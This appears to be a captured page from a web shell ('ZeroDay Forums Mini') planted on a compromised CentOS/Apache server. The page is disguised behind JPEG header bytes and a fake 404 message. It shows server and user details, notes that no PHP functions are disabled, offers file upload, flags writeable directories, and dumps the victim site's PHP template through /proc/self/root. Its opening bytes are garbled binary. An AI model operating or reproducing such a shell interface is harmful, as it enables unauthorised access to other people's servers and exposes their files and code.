����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /proc/self/root/var/www/html/tien-dien/code/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/var/www/html/tien-dien/code/pages/list_tpl.php
<!-- page title area start -->
<div class="page-title__area pt-50" style="background-image: url(<?php echo $menu_bg;?>);">
    <div class="container">
        <div class="row">
            <div class="col-xxl-12">
                <div class="page__title-wrapper text-center">
                    <h3 class="pb-50"><?php
                        echo ($val['title']??'');
                        ?></h3>
                </div>
            </div>
        </div>
    </div>
    <nav class="breadccrumb-bg">
        <ul class="breadcrumb justify-content-center pt-20 pb-20">
            <li class="bd-items"><a href="/?">Home</a></li>
            <?php
            if(isset($arr_bread) and !empty($arr_bread)) {
                foreach ($arr_bread as $val){
                    echo $val['breadcrumb'];
                }
            }
            ?>
        </ul>
    </nav>
</div>
<!-- page title area end -->

<section class="blog-area pt-120 pb-90 wow fadeInUp" data-wow-delay="0.3s" style="visibility: visible; animation-delay: 0.3s; animation-name: fadeInUp;">
    <div class="container">
        <div class="row">
            <?php echo $list;?>
            <div class="col-lg-12">
                <ul class="pagination justify-content-center">
                    <?php echo $nav;?>
                </ul>
            </div>
        </div>
    </div>
</section>

ZeroDay Forums Mini